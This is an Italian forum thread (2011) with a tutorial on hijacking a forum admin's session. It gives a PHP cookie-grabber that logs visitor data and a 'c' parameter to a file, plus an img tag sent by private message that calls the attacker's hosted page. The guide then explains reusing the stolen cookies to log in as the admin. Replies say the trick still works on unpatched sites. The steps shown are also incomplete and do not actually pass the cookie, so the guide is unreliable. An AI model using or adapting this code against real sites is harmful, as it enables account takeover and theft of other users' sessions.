Defacciare un sito

« Older   Newer »
  Share  
view post Posted on 9/5/2011, 17:30
Avatar

Water can take unforseen forms.

Group:
Administrator
Posts:
5,273
Location:
Shabang

Status:


Salve, oggi vi spiego come defacciare un sito (o meglio ottenere i privilegi di admin in un sito come forum free o ecc)

1- trovare lo spazio web dove uppare i file... ( altervista)

2- stabilire una vittima ;) (mi sembra ovvio che dovrà essere un vostro account di prova)

3-Avere un minimo di pazienza, seguire alla lettera tutte le procedure e conoscere l' informatica ( se no a studiare :P)

4-Iniziamo seriamente, ora dovremmo creare 2 file .php

CODICE
<?php

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];

$time = date("Y-m-d G:i:s A");
$text = "<br><br>".$time." = ".$ip."<br><br>User Agent:".$agent."<br>Referer: ".$referer."<br>Session: ".$data."<br><br><br>";

$file = fopen('vb.php' , 'a');
fwrite($file,$text);
fclose($file);
header("Location: http://www.google.it");

?>



Il secondo

CODICE
<head>
<meta http-equiv="Content-Language" content="it">
<title>Cookie Grabber - Created By Psynfected</title>
</head>

<body bgcolor="#000000">

<p align="center"><font color="#00FF00"><b><img src="http://www.allevamentolola.it/psynfected.png" width="567" height="344"></b></font></p>
<p align="left">&nbsp;</p>

</body>



Adesso non resta altro che uppare i file sull'hosting... su altervista è facilissimo.. basta che create i file.php è inserite i codici.

Su gli altri hosting non sò dirvi.. potrebbe essere che richiedano Filezilla (FTP).

Ora abbiamo creato i file e otterremo i seguenti link:
CODICE
[http://www.miosito.altervista.org/documents.php ]

[http://www.miosito.altervista.org/vb.php ]



Ora abbiamo eseguito la arte difficile


5- mandiamo un pm alla vittima con il seguente codice
CODICE
<img src="http://www.miosito.altervista.org/documents.php">


6-L' ADMIN aprirà il messaggio e non si accorgerà di niente

7- La pagina è tutta nera.. selezionate la pagina e ci saranno i cookie dell'admin. adesso aprite internet incollate il codice nell'URL e magicamente sarete loggati con i dati dell'admin.


IO NON MI ASSUMO ALCUNA RESPONSABILOITA' SULLE VOSTRE LAMERATE, QUESTA GUIDA E' SOLO A SCOPO INFORMATIVO

SE AVETE GRADITO LASCIATE UN MESSAGGIO



 
Web  Top
Turles™
view post Posted on 14/6/2011, 18:49




Non funziona più.
 
Top
view post Posted on 14/6/2011, 19:00
Avatar

Water can take unforseen forms.

Group:
Administrator
Posts:
5,273
Location:
Shabang

Status:


Su forumfree no.... su altri siti che non lo hanno corretto si ;)
 
Web  Top
Turles™
view post Posted on 14/6/2011, 19:12




Mi riferivo a ForumFree perchè avevi citato quello.
 
Top
3 replies since 9/5/2011, 17:30   922 views
  Share